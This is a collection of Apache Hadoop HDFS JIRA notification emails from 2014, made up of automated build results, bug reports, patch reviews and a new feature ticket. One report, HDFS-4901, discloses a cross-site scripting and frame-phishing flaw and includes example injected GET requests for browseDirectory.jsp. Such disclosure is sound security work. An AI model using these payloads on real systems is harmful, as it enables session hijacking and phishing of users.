{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7521//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7521//console

This message is automatically generated.

> DN fails to startup if one of the data dir is full
> --
>
> Key: HDFS-5185
> URL: https://issues.apache.org/jira/browse/HDFS-5185
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Reporter: Vinayakumar B
>Assignee: Vinayakumar B
>Priority: Critical
> Attachments: HDFS-5185.patch
>
>
> DataNode fails to startup if one of the data dirs configured is out of space. 
> fails with following exception
> {noformat}2013-09-11 17:48:43,680 FATAL 
> org.apache.hadoop.hdfs.server.datanode.DataNode: Initialization failed for 
> block pool Block pool  (storage id 
> DS-308316523-xx.xx.xx.xx-64015-1378896293604) service to /nn1:65110
> java.io.IOException: Mkdirs failed to create 
> /opt/nish/data/current/BP-123456-1234567/tmp
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.BlockPoolSlice.(BlockPoolSlice.java:105)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeImpl.addBlockPool(FsVolumeImpl.java:216)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsVolumeList.addBlockPool(FsVolumeList.java:155)
> at 
> org.apache.hadoop.hdfs.server.datanode.fsdataset.impl.FsDatasetImpl.addBlockPool(FsDatasetImpl.java:1593)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataNode.initBlockPool(DataNode.java:834)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPOfferService.verifyAndSetNamespaceInfo(BPOfferService.java:311)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.connectToNNAndHandshake(BPServiceActor.java:217)
> at 
> org.apache.hadoop.hdfs.server.datanode.BPServiceActor.run(BPServiceActor.java:660)
> at java.lang.Thread.run(Thread.java:662)
> {noformat}
> It should continue to start-up with other data dirs available.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6791) A block could remain under replicated if all of its replicas are on decommissioned nodes

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6791?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081882#comment-14081882
 ] 

Hadoop QA commented on HDFS-6791:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12659022/HDFS-6791.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 1 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7520//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7520//console

This message is automatically generated.

> A block could remain under replicated if all of its replicas are on 
> decommissioned nodes
> 
>
> Key: HDFS-6791
> URL: https://issues.apache.org/jira/browse/HDFS-6791
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
>Assignee: Ming Ma
> Attachments: HDFS-6791.patch
>
>
> Here is the scenario.
> 1. Normally before NN transitions a DN to decommissioned state, enough 
> replicas have been copied to other "in service" DNs. However, in some rare 
> situations, the cluster got into a state where a DN is in decommissioned 
> state and a block's only replica is on that DN. In such state, the number of 
> replication reported by fsck is 1; the block just stays in under replicated 
> state; applications can still read the data, given decommissioned node can 
> served read traffic.
> This can happen in some error situations such DN failure or NN failover. For 
> example
> a) a block's only replica is node A temporarily.
> b) Start decommission process on node A.
> c) When node A is in "decommission-in-progress" state, node A crashed. NN 
> will mark node A as dead.
> d) After node A rejoins the cluster, NN will mark node A as decommissioned. 
> 2. In theory, NN should take care of under replicated blocks. But it doesn't 
> for this special case where the only replica is on decommissioned node. That 
> is because NN has the policy of "decommissioned node can't be picked the 
> source node for replication".
> {noformat}
> BlockManager.java
> chooseSourceDatanode
>   // never use already decommissioned nodes
>   if(node.isDecommissioned())
> continue;
> {noformat}
> 3. Given NN marks the node as decommissioned, admins will shutdown the 
> datanode. Under replicated blocks turn into missing blocks.
> 4. The workaround is to recommission the node so that NN can start the 
> replication from the node.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-4901) Site Scripting and Phishing Through Frames in browseDirectory.jsp

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-4901?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081864#comment-14081864
 ] 

Hadoop QA commented on HDFS-4901:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  
http://issues.apache.org/jira/secure/attachment/12627367/HDFS-4901_branch-1.2.patch
  against trunk revision .

{color:red}-1 patch{color}.  The patch command could not apply the patch.

Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7523//console

This message is automatically generated.

> Site Scripting and Phishing Through Frames in browseDirectory.jsp
> -
>
> Key: HDFS-4901
> URL: https://issues.apache.org/jira/browse/HDFS-4901
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: security, webhdfs
>Affects Versions: 1.2.1
>Reporter: Jeffrey E  Rodriguez
>Assignee: Vivek Ganesan
>Priority: Blocker
> Attachments: HDFS-4901.patch, HDFS-4901.patch.1, 
> HDFS-4901_branch-1.2.patch
>
>   Original Estimate: 24h
>  Time Spent: 24h
>  Remaining Estimate: 0h
>
> It is possible to steal or manipulate customer session and cookies, which 
> might be used to impersonate a legitimate user,
> allowing the hacker to view or alter user records, and to perform 
> transactions as that user.
> e.g.
> GET /browseDirectory.jsp? dir=%2Fhadoop'"/>alert(759) 
> &namenodeInfoPort=50070
> Also;
> Phishing Through Frames
> Try:
> GET /browseDirectory.jsp? 
> dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
> &namenodeInfoPort=50070 HTTP/1.1
> Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
> Accept-Language: en-US
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081859#comment-14081859
 ] 

Hadoop QA commented on HDFS-6783:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12659005/HDFS-6783.003.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:red}-1 tests included{color}.  The patch doesn't appear to include 
any new or modified tests.
Please justify why no new tests are needed for this 
patch.
Also please list what manual steps were performed to 
verify this patch.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7518//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7518//console

This message is automatically generated.

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In monitor thread, needsRescan is set to false before real scan starts, so 
> for {{waitForRescanIfNeeded}} will return for the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081849#comment-14081849
 ] 

Akira AJISAKA commented on HDFS-6789:
-

I applied the patch and confirmed the tests passed in two environments:
* Oracle JDK7u40 in Mac OS X 10.9
* Oracle JDK7u65 in CentOS 6.4

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests .



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Yongjun Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081847#comment-14081847
 ] 

Yongjun Zhang commented on HDFS-6788:
-

Hi Andrew and Arpit,  Thanks a lot for reviewing and addressing my question, 
and even taking care of triggering the build! 




> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6789:


Target Version/s: 2.5.0
  Status: Patch Available  (was: Open)

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests .



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6789:


Component/s: test

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests .



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6789:


Attachment: HDFS-6789.patch

Attaching a patch to spy NameSpace after initializing FileSystem.

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
> Attachments: HDFS-6789.patch
>
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests .



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6787) Remove duplicate code in FSDirectory#unprotectedConcat

2014-07-31 Thread Yi Liu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6787?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081838#comment-14081838
 ] 

Yi Liu commented on HDFS-6787:
--

Thank Uma, yes, I have debugged that inodes are cleaned correctly.

> Remove duplicate code in FSDirectory#unprotectedConcat
> --
>
> Key: HDFS-6787
> URL: https://issues.apache.org/jira/browse/HDFS-6787
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: namenode
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6787.001.patch
>
>
> {code}
> // update inodeMap
> removeFromInodeMap(Arrays.asList(allSrcInodes));
> {code}
> this snippet of code is duplicate, since we already have the logic above it:
> {code}
> for(INodeFile nodeToRemove: allSrcInodes) {
>   if(nodeToRemove == null) continue;
>   
>   nodeToRemove.setBlocks(null);
>   trgParent.removeChild(nodeToRemove, trgLatestSnapshot);
>   inodeMap.remove(nodeToRemove);
>   count++;
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Tsz Wo Nicholas Sze updated HDFS-6794:
--

 Component/s: namenode
Priority: Minor  (was: Major)
Hadoop Flags: Reviewed

+1 patch looks good.

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: namenode
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
>Priority: Minor
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch, HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081837#comment-14081837
 ] 

Akira AJISAKA commented on HDFS-6789:
-

The tests fail because
{code}
FileSystem fs = HATestUtil.configureFailoverFs(cluster, conf);
{code}
calls {{NameNode.getAddress(nameNodeUri)}} to get {{InetSocketAddress}} for 
initializing {{ProxyAndInfo}} after HDFS-6507.
Since the tests are to ensure {{FileSystem}} and {{FileContext}} does not 
resolve the logical hostname, I think it's fine to spy NameService after 
initializing {{FileSystem}}.

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests .



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6801) Archival Storage: Add a new data migration tool

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)
Tsz Wo Nicholas Sze created HDFS-6801:
-

 Summary: Archival Storage: Add a new data migration tool 
 Key: HDFS-6801
 URL: https://issues.apache.org/jira/browse/HDFS-6801
 Project: Hadoop HDFS
  Issue Type: Sub-task
Reporter: Tsz Wo Nicholas Sze
Assignee: Tsz Wo Nicholas Sze


The tool is similar to Balancer.  It periodic scans the blocks in HDFS and uses 
path and/or other meta data (e.g. mtime) to determine if a block should be 
cooled down (i.e. hot => warm, or warm => cold) or warmed up (i.e. cold => 
warm, or warm => hot).  In contrast to Balancer, the migration tool always move 
replicas to a different storage type.  Similar to Balancer, the replicas are 
moved in a way that the number of racks the block does not decrease.




--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Arpit Agarwal (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Arpit Agarwal updated HDFS-6794:


Attachment: HDFS-6794.03.patch

I missed that from the last Jenkins run, thanks Nicholas.

Updated patch attached.

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch, HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6784) Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls setNeedsRescan multiple times.

2014-07-31 Thread Yi Liu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6784?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081811#comment-14081811
 ] 

Yi Liu commented on HDFS-6784:
--

Thanks [~cmccabe], let's wait to see whether we need to handle it separately 
after HDFS-6783.

> Avoid rescan twice in HDFS CacheReplicationMonitor for one FS Op if it calls 
> setNeedsRescan multiple times.
> ---
>
> Key: HDFS-6784
> URL: https://issues.apache.org/jira/browse/HDFS-6784
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6784.001.patch
>
>
> In HDFS CacheReplicationMonitor,  rescan is expensive. Sometimes, 
> {{setNeedsRescan}} is called multiple times, for example, in 
> FSNamesystem#modifyCacheDirective, there are 3 times. In monitor thread of 
> CacheReplicationMonitor, if it checks {{needsRescan}} is true, rescan will 
> happen, but {{needsRescan}} is set to false before real scan. Meanwhile, the 
> 2nd or 3rd time {{setNeedsResacn}} may set {{needsRescan}} to true. So after 
> the scan finish, in next loop, a new rescan will be triggered, that's not 
> necessary at all and inefficient for rescan twice. 



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6777) Supporting consistent edit log reads when in-progress edit log segments are included

2014-07-31 Thread James Thomas (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6777?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Thomas updated HDFS-6777:
---

Status: Patch Available  (was: Open)

> Supporting consistent edit log reads when in-progress edit log segments are 
> included
> 
>
> Key: HDFS-6777
> URL: https://issues.apache.org/jira/browse/HDFS-6777
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: qjm
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6777-design.pdf, HDFS-6777.patch
>
>
> For inotify, we want to be able to read transactions from in-progress edit 
> log segments so we can serve transactions to listeners soon after they are 
> committed. This JIRA works toward ensuring that we do not send unsync'ed 
> transactions back to the client by 1) discarding in-progress segments if we 
> have a finalized segment starting at the same transaction ID and 2) if there 
> are no finalized segments at the same transaction ID, using only the 
> in-progress segments with the largest seen lastWriterEpoch. See the design 
> document for more background and details.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Assigned] (HDFS-6789) TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA reassigned HDFS-6789:
---

Assignee: Akira AJISAKA

> TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI and 
> TestDFSClientFailover.testDoesntDnsResolveLogicalURI failing on jdk7
> 
>
> Key: HDFS-6789
> URL: https://issues.apache.org/jira/browse/HDFS-6789
> Project: Hadoop HDFS
>  Issue Type: Bug
>Affects Versions: 2.5.0
> Environment: jdk7
>Reporter: Rushabh S Shah
>Assignee: Akira AJISAKA
>
> The following two tests are failing on jdk7.
> org.apache.hadoop.hdfs.TestDFSClientFailover.testFileContextDoesntDnsResolveLogicalURI
> org.apache.hadoop.hdfs.TestDFSClientFailover.testDoesntDnsResolveLogicalURI
> On jdk6 it just skips the tests .



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6783) Fix HDFS CacheReplicationMonitor rescan logic

2014-07-31 Thread Yi Liu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6783?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081803#comment-14081803
 ] 

Yi Liu commented on HDFS-6783:
--

Thanks [~cmccabe], not need apologize, our goal is to resolve the issue 
together :)

The new version patch can resolve the issue in {{waitForRescanIfNeeded}}, but I 
didn't see it can solve the issue in HDFS-6784, look at following steps:
{code}
init state
completedScanCount = 0;
curScanCount = -1;
neededScanCount = 1;

setNeedsRecan--
completedScanCount = 0;
curScanCount = -1;
neededScanCount = 1;

in while loop--
completedScanCount = 0;
curScanCount = 1;
neededScanCount = 1;

setNeedsRescan-
completedScanCount = 0;
curScanCount = 1;
neededScanCount = 2;

rescan-
after rescan
completedScanCount = 1;
curScanCount = -1;
neededScanCount = 2;<--- completedScanCount < neededScanCount, still there 
will be another unnecessary rescan.
{code}

> Fix HDFS CacheReplicationMonitor rescan logic
> -
>
> Key: HDFS-6783
> URL: https://issues.apache.org/jira/browse/HDFS-6783
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 3.0.0
>Reporter: Yi Liu
>Assignee: Yi Liu
> Attachments: HDFS-6783.001.patch, HDFS-6783.002.patch, 
> HDFS-6783.003.patch
>
>
> In monitor thread, needsRescan is set to false before real scan starts, so 
> for {{waitForRescanIfNeeded}} will return for the first condition:
> {code}
> if (!needsRescan) {
>   return;
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6757) Simplify lease manager with INodeID

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6757?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081799#comment-14081799
 ] 

Colin Patrick McCabe commented on HDFS-6757:


[~daryn]: yeah, we could provide both an inode ID and a path in the close op.  
Maybe that's the best option here...

> Simplify lease manager with INodeID
> ---
>
> Key: HDFS-6757
> URL: https://issues.apache.org/jira/browse/HDFS-6757
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Haohui Mai
>Assignee: Haohui Mai
> Attachments: HDFS-6757.000.patch, HDFS-6757.001.patch, 
> HDFS-6757.002.patch, HDFS-6757.003.patch, HDFS-6757.004.patch
>
>
> Currently the lease manager records leases based on path instead of inode 
> ids. Therefore, the lease manager needs to carefully keep track of the path 
> of active leases during renames and deletes. This can be a non-trivial task.
> This jira proposes to simplify the logic by tracking leases using inodeids 
> instead of paths.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081798#comment-14081798
 ] 

Tsz Wo Nicholas Sze commented on HDFS-6794:
---

For the findbugs warnings, we should keep using dn instead of node in the code 
below.
{code}
 if (node == null) {
-  throw new IOException("Cannot mark " + b
-  + " as corrupt because datanode " + dn + " (" + dn.getDatanodeUuid()
+  throw new IOException("Cannot mark " + blk
+  + " as corrupt because datanode " + node + " (" + 
node.getDatanodeUuid()
   + ") does not exist");
 }
{code}

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Tsz Wo Nicholas Sze updated HDFS-6685:
--

   Resolution: Fixed
Fix Version/s: 2.6.0
 Hadoop Flags: Reviewed
   Status: Resolved  (was: Patch Available)

Thanks Arpit for reviewing the patches.

I have committed this.

> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Fix For: 2.6.0
>
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
